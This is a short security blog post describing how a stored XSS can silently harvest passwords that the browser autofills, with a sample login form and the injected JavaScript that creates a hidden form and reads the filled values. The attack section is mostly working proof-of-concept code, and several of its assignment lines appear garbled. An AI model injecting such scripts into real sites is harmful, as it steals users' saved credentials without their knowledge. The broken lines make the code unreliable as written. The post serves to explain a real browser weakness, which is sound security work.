mercredi 20 juin 2018

Credential stealing with XSS without user interaction

0/ Intro

XSS are everywhere, on a lot of websites. It has been called the most underrated security vulnerability.

On one hand, you can pop up an alert('PWNED') but it's not really worth to fear an alert() in your browser.

On the other hand, people tend to store Login/Password in the browser. You log on to intranet.corp and Firefox asks to save password. You click yes.

After a chat with @XeR, we figured that we can combine both to silently steal your credential with a simple XSS, without user interaction.

1/ Show me the code, or die()!

Our login form for intranet.corp:

        <input type="text" name="user" />
        <input type="password" name="pass" />
        <input type="submit" />
  <!-- This is propa codaz -->

Log once, store password in browser:

The browser has saved the password. If you return to the login.html page, the user and pass are filled.

2/ Attack

Let say we have a stored XSS in website. Innocent user surf to this page. This page include evil javascript:

var form = document.createElement("form");
var text = document.createElement("input");
var pass = document.createElement("input");   = "login"; = "login";
text.type = "text";   = "password"; = "password";
pass.type = "password";


window.addEventListener("load", function() {
 console.log("evil loader");
 window.setTimeout(function() {
  alert(text.value + ":" + pass.value);
 }, 1000);

And "voilà". Javascript here add a form, Firefox autocomplete the values, then our little js read the values and alert() them to screen (possibilities are endless here).

Attacker can now login to intranet.corp. Note that user doesn't need to be tricked to enter information in a fake form, or phished. The js code will nicely ask the browser to give him the login/pass.

3/ Best parts

You don't have any user interaction with this attack. The user doesn't have to put log and pass in a form, it just have to trigger the XSS[1] .
This hasn't anything to do with cookies, so HTTPS or http_only won't help. We want the pass, we have the pass.
Moar fun, the user doesn't need to be logged in! If XSS is triggered, boom, credz are for attacker.
If you find a stored XSS on a site with many users, you'll raise your luck to get credz, just wait.

99/ Outro

Be nice with others, and in case you wonder, I don't use the password manager of my browser.
Thanks for @XeR for the chat which lead to this.
8 times down. 9 times up!

[1] Finding the XSS is an exercise left to the reader